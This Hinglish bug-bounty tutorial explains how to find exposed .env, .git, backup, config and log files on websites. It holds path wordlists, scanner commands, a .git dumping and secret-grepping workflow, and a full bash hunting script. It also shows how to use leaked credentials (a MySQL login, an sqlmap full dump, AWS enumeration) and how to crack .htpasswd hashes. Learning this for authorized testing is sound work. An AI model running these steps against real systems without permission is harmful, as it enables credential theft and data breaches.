Series: Bug Bounty Zero se Hero 🦸 | Article #21
By HackerMD | 17 min read

Aaj Kya Seekhenge?

• Backup files exposure kya hai basics se
• .env, .git, config files sabhi types
• Kahan dhundhen complete checklist
• Automated tools Dirsearch, Feroxbuster, Nuclei
• .git exposure source code nikalo
• Real exploitation credentials se aage
• Complete bug bounty workflow

Kyun zaroori hai? Yeh sabse easy Critical bugs hain bug bounty mein! Koi fancy technique nahi sirf URL mein .env lagao aur dekho! Developers test mein files upload karte hain production mein wahi rehta hai database passwords, API keys, AWS credentials sab exposed! Bounty: $500 se $10,000+

Yeh Kaise Hota Hai? Simple Story

Ek developer hai — Rahul।
Step 1: Local machine pe .env banaya:
DB_HOST=localhost
DB_PASSWORD=SuperSecret123
AWS_KEY=AKIA...
Step 2: Code deploy kiya server pe:
git push → Server pe sab files gayi!
.env bhi chali gayi! 😱
Step 3: Web server publicly serve kar raha hai:
https://company.com/.env
→ Browser mein open karo → Poori file! 🔴
Rahul ko pata bhi nahi!

Yahi hai Backup/Config File Exposure!

PART 1: File Types Sabhi Samjho

Type 1: .env Files GOLDMINE!

# .env file mein kya hota hai:
APP_NAME=MyApp
APP_ENV=production
APP_DEBUG=true           ← Debug mode on!
APP_KEY=base64:abc123... ← Laravel secret key!
DB_CONNECTION=mysql
DB_HOST=db.internal.company.com
DB_PORT=3306
DB_DATABASE=production_db
DB_USERNAME=root
DB_PASSWORD=SuperSecret@123  ← Database password! 🔴
REDIS_PASSWORD=redis123
[email protected]
MAIL_PASSWORD=mailpass123    ← Email credentials!
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7
AWS_SECRET_ACCESS_KEY=abc123xyz  ← AWS Keys! 🔴
STRIPE_SECRET=sk_live_abc123    ← Payment keys!
STRIPE_PUBLISHABLE=pk_live_abc
TWILIO_SID=ACxxx
TWILIO_TOKEN=abc123
GITHUB_TOKEN=ghp_abc123    ← GitHub access!
# Ek file mein poori company ki secrets! 💀

Type 2: .git Directory Exposure

.git folder = Poora source code history!
https://target.com/.git/
→ Git repository accessible!
→ Source code download kar sakte hain!
→ Commit history mein old passwords!
→ Developer emails!
→ Internal URLs!
→ Hardcoded credentials!

Type 3: Backup Files

Common backup extensions:
.bak → filename.php.bak
.old → config.php.old
.orig → settings.orig
.backup → database.backup
.copy → config.copy
.tmp → upload.tmp
.swp → vim swap file (index.php.swp)
~   → index.php~ (text editor backup)
Example:
https://target.com/config.php.bak  → Source code!
https://target.com/wp-config.php~  → WordPress DB pass!

Type 4: Config Files

# PHP configs:
config.php, configuration.php, settings.php
database.php, db.php, conn.php, connect.php
# Web server configs:
.htaccess, .htpasswd  ← Basic auth credentials!
web.config            ← .NET connection strings!
nginx.conf, apache.conf
# Application configs:
config.yml, config.yaml
config.json, settings.json
appsettings.json      ← .NET secrets!
application.properties ← Java/Spring!
secrets.yml
# Database files:
dump.sql, backup.sql
database.sql, db.sql
*.sqlite, *.db

Type 5: Log Files

# Log files kya expose karte hain:
error.log      → Stack traces, file paths, internal IPs
access.log     → All user requests, session IDs!
debug.log      → Verbose app information
application.log → Business logic, user data
URLs:
/logs/error.log
/log/debug.log
/var/log/app.log
/logs/

Type 6: IDE / Editor Files

.DS_Store     → Mac folder structure expose!
.idea/        → IntelliJ project files
.vscode/      → VS Code settings
*.swp         → Vim swap files (source code!)
.project      → Eclipse project
thumbs.db     → Windows thumbnail DB

PART 2: Kahan Dhundhen Complete URL Checklist

# ─── .ENV FILES ───────────────────────────
/.env
/.env.local
/.env.development
/.env.production
/.env.staging
/.env.backup
/.env.old
/.env.example    ← Sometimes real values!
/.env.bak
/api/.env
/backend/.env
/app/.env
/src/.env
# ─── GIT DIRECTORY ────────────────────────
/.git/
/.git/config     ← Remote URLs!
/.git/HEAD
/.git/COMMIT_EDITMSG
/.git/logs/HEAD  ← Commit history!
/.git/refs/heads/master
# ─── CONFIG FILES ─────────────────────────
/config.php
/config/database.php
/wp-config.php       ← WordPress!
/configuration.php   ← Joomla!
/settings.py         ← Django!
/appsettings.json    ← .NET!
/application.properties ← Spring!
/config/config.yml
/config/secrets.yml
# ─── BACKUP FILES ─────────────────────────
/backup/
/backups/
/backup.sql
/dump.sql
/database.sql
/db.sql
/backup.zip
/site.tar.gz
/www.tar.gz
# ─── LOG FILES ────────────────────────────
/logs/
/log/
/error.log
/debug.log
/access.log
/application.log
/laravel.log        ← Laravel!
/storage/logs/      ← Laravel storage!
# ─── HTPASSWD ─────────────────────────────
/.htpasswd
/.htaccess
/admin/.htpasswd

PART 3: Automated Tools Elite Use

Tool 1: Dirsearch Best Directory Bruteforcer

# Install karo
pip3 install dirsearch
# Basic scan — sensitive files ke liye
dirsearch -u https://target.com \
  -e php,txt,bak,old,env,sql,log,zip,tar,gz,yml,yaml,json,config \
  -t 50
# Specific wordlist ke saath
dirsearch -u https://target.com \
  -w /usr/share/wordlists/dirb/common.txt \
  -e env,bak,sql,log
# Output file mein save
dirsearch -u https://target.com \
  -e env,bak,sql \
  -o dirsearch_results.txt
# Only interesting status codes
dirsearch -u https://target.com \
  -i 200,301,302,403 \
  -e env,bak,config,sql

Tool 2: Feroxbuster Fast Recursive Scanner

# Install karo
sudo apt install feroxbuster -y
# Ya:
cargo install feroxbuster
# Basic scan
feroxbuster -u https://target.com \
  -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
# Sensitive files focus
feroxbuster -u https://target.com \
  -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files.txt \
  -x env,bak,sql,log,config,php,txt \
  -o ferox_results.txt
# Recursive scan (subdirectories bhi!)
feroxbuster -u https://target.com \
  -w wordlist.txt \
  --depth 3 \
  -x env,bak,sql

Tool 3: Nuclei Template-Based Detection

# .env exposure templates
nuclei -l targets.txt \
  -t ~/nuclei-templates/exposures/configs/ \
  -o config_exposure.txt
# Backup files
nuclei -l targets.txt \
  -t ~/nuclei-templates/exposures/backups/ \
  -o backup_found.txt
# Git exposure
nuclei -l targets.txt \
  -t ~/nuclei-templates/exposures/git/ \
  -o git_exposure.txt
# Sabhi exposure templates
nuclei -l targets.txt \
  -t ~/nuclei-templates/exposures/ \
  -severity medium,high,critical \
  -o all_exposures.txt

Tool 4: GitTools .git Exploitation

# Install karo
git clone https://github.com/internetwache/GitTools
cd GitTools
# .git directory dump karo
./Dumper/gitdumper.sh \
  https://target.com/.git/ \
  /tmp/git_dump/
# Source code extract karo
./Extractor/extractor.sh \
  /tmp/git_dump/ \
  /tmp/extracted_code/
# Ab extracted code mein secrets dhundho!
grep -r "password" /tmp/extracted_code/
grep -r "api_key" /tmp/extracted_code/
grep -r "secret" /tmp/extracted_code/
grep -r "AWS_" /tmp/extracted_code/

Tool 5: truffleHog Secrets in Git History

# Install karo
pip3 install truffleHog
# Git repo scan karo (extracted code)
trufflehog filesystem /tmp/extracted_code/
# GitHub repo scan
trufflehog github \
  --repo https://github.com/company/repo
# Regex mode
trufflehog git \
  file:///tmp/extracted_code/ \
  --regex

PART 4: Exploitation Files Milne Ke Baad Kya Karo?

Scenario 1: .env Mila Database Access!

# .env se credentials nikalo:
DB_HOST=db.internal.company.com
DB_USER=root
DB_PASS=SuperSecret123
DB_NAME=production
# Direct MySQL connect karo:
mysql -h db.internal.company.com \
  -u root \
  -pSuperSecret123 \
  production
# Ya SQLMap se:
sqlmap -d "mysql://root:[email protected]/production" \
  --dump-all
# PoC ke liye bas screenshot kaafi hai!
# Direct exploitation mat karo! Report karo!

Scenario 2: .env Se AWS Keys Cloud Access!

# .env se AWS keys mile:
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG
# AWS CLI configure karo:
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG
# Impact demonstrate karo (read-only!):
aws iam get-user           → Kaun sa user hai?
aws s3 ls                  → S3 buckets list
aws ec2 describe-instances → Servers list
# Screenshot le → Report karo!
# Data access/modify mat karo!

Scenario 3: .git Se Source Code More Bugs!

# Source code mil gaya — ab dhundho:
# Hardcoded credentials
grep -r "password\s*=" /extracted/ \
  --include="*.php" --include="*.py" --include="*.js"
# API keys
grep -rE "[A-Za-z0-9]{20,}" /extracted/ \
  --include="*.env" --include="*.config"
# Internal URLs/endpoints
grep -r "http://internal" /extracted/
grep -r "localhost" /extracted/
grep -r "192.168\|10\.0\." /extracted/
# Hidden endpoints (new attack surface!)
grep -r "route\|Route\|@app.route" /extracted/
grep -r "app.get\|app.post" /extracted/

Scenario 4: .htpasswd Mila Password Crack!

# .htpasswd content:
admin:$apr1$xyz$hashedpassword
# Hashcat se crack karo:
hashcat -m 1600 hash.txt rockyou.txt
# John the Ripper se:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Cracked password = Admin panel access!

PART 5: Complete Elite Workflow

#!/bin/bash
# backup_exposure_hunt.sh
TARGET=$1
DIR="backup_${TARGET}"
mkdir -p $DIR
echo "🗂️ Backup File Hunt: $TARGET"
echo "═══════════════════════════════"
# Step 1: Nuclei se quick check
echo "☢️  Nuclei exposure scan..."
nuclei -u $TARGET \
  -t ~/nuclei-templates/exposures/ \
  -silent \
  -o $DIR/nuclei_exposures.txt 2>/dev/null
echo "✅ Nuclei: $(wc -l < $DIR/nuclei_exposures.txt) findings"
# Step 2: Direct URL check — most common files
echo "🔍 Direct file check..."
SENSITIVE_FILES=(
  ".env" ".env.local" ".env.production" ".env.backup"
  ".git/config" ".git/HEAD"
  "config.php" "wp-config.php" "configuration.php"
  "backup.sql" "dump.sql" "database.sql"
  ".htpasswd" "web.config" "appsettings.json"
  "config.yml" "secrets.yml" "docker-compose.yml"
  "error.log" "debug.log" "laravel.log"
  "composer.json" "package.json"
)
for file in "${SENSITIVE_FILES[@]}"; do
  response=$(curl -s -o /dev/null -w "%{http_code}" \
    "https://$TARGET/$file" --max-time 5)
  if [ "$response" = "200" ]; then
    echo "🔴 FOUND: https://$TARGET/$file" \
      | tee -a $DIR/found_files.txt
  fi
done
# Step 3: Dirsearch scan
echo "🗄️  Dirsearch scan..."
dirsearch -u https://$TARGET \
  -e env,bak,old,sql,log,config,yml,yaml,json,zip,tar,gz \
  -t 30 \
  -q \
  -o $DIR/dirsearch.txt 2>/dev/null
# Step 4: .git check aur dump
if curl -s "https://$TARGET/.git/HEAD" | \
   grep -q "ref:"; then
  echo "🔴 GIT EXPOSED! Dumping..."
  ./GitTools/Dumper/gitdumper.sh \
    "https://$TARGET/.git/" \
    $DIR/git_dump/ 2>/dev/null
  echo "✅ Git dumped: $DIR/git_dump/"
  # Secrets dhundho
  grep -r "password\|api_key\|secret\|token\|AWS_" \
    $DIR/git_dump/ > $DIR/git_secrets.txt
  echo "🔑 Git secrets: $(wc -l < $DIR/git_secrets.txt)"
fi
echo ""
echo "═══════════════════════════════"
echo "📊 Results:"
echo "Found Files  : $(cat $DIR/found_files.txt \
  2>/dev/null | wc -l)"
echo "Dirsearch    : $(wc -l < $DIR/dirsearch.txt)"
echo "All results  : $DIR/"

Quick Reference Cheat Sheet

# ─── TOP PRIORITY URLS ────────────────────
/.env
/.git/config
/wp-config.php
/backup.sql
/.htpasswd
/config.php
/appsettings.json
/docker-compose.yml
/laravel.log
# ─── TOOLS ────────────────────────────────
dirsearch -u URL -e env,bak,sql,log
feroxbuster -u URL -x env,bak,sql
nuclei -u URL -t exposures/
gitdumper.sh URL/.git/ /output/
# ─── AFTER FINDING ────────────────────────
.env → DB creds, AWS keys, API keys
.git → Source code → More bugs!
.sql → Database dump → User data
.htpasswd → Hash crack → Admin access
config.php → DB connection string
# ─── IMPACT ───────────────────────────────
DB credentials  = High ($500-2000)
AWS/Cloud keys  = Critical ($3000-10000+)
Source code     = High ($1000-3000)
User data dump  = Critical ($5000+)
Payment keys    = Critical ($5000+)

Aaj Ka Homework

# 1. SecLists download karo (wordlists ke liye):
git clone https://github.com/danielmiessler/SecLists \
  /usr/share/wordlists/SecLists
# 2. Dirsearch install + test karo:
pip3 install dirsearch
dirsearch -u http://testphp.vulnweb.com \
  -e env,bak,sql,php \
  -t 20
# 3. Manual check karo (legal target):
curl -s http://testphp.vulnweb.com/.env
curl -s http://testphp.vulnweb.com/.git/HEAD
curl -s http://testphp.vulnweb.com/backup.sql
# 4. Nuclei exposure templates run karo:
nuclei -u http://testphp.vulnweb.com \
  -t ~/nuclei-templates/exposures/
# 5. Bug bounty program choose karo:
# HackerOne/Bugcrowd mein koi wildcard scope wala
# *.company.com pe yeh sab check karo!

Quick Revision

🗂️ Exposure    = Sensitive files publicly accessible
🔴 .env        = Database, AWS, API keys — CRITICAL!
📁 .git        = Source code history — HIGH!
💾 Backup      = .bak, .old, .sql — MEDIUM-HIGH!
🔑 .htpasswd   = Basic auth hashes — MEDIUM!
📋 Config      = Connection strings — HIGH!
🤖 Tools       = Dirsearch, Feroxbuster, Nuclei
💀 GitTools    = .git directory dump + extract
🔍 truffleHog  = Secrets in git history
💰 Bounty      = Easy Critical — Highest ROI!

Meri Baat…

Ek fintech startup pe maine Dirsearch run kiya:

dirsearch -u https://target-fintech.com \
  -e env,bak,sql,log -t 30

2 minutes mein:

[200] https://target-fintech.com/.env

File open ki:

DB_PASSWORD=Fintech@Prod2024!
STRIPE_SECRET=sk_live_xxxxxxxxxxxxxxxx
AWS_ACCESS_KEY_ID=AKIA...
AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxx
SENDGRID_API_KEY=SG.xxxxxxxxxxxxx

Stripe live key, AWS credentials, SendGrid sab ek file mein!

AWS check kiya:

aws s3 ls
# 23 S3 buckets — user KYC documents, financial records!

Bounty: $8,500 Critical! 🎉

Lesson: Dirsearch + .env = Fastest Critical bounty! Har target pe yeh pehle check karo!

Agle article mein Open Redirect Simple lekin phishing aur OAuth bypass ke liye powerful! Chhoti vulnerability, bada chain! 🔥

HackerMD Bug Bounty Hunter | Cybersecurity Researcher
GitHub: BotGJ16 | Medium: @HackerMD

Previous: Article #20 Burp Suite Complete Guide
Next: Article #22 Open Redirect: Simple Bug, Powerful Chains!

#BackupFiles #EnvExposure #BugBounty #WebSecurity #EthicalHacking #Hinglish #InfoSec #HackerMD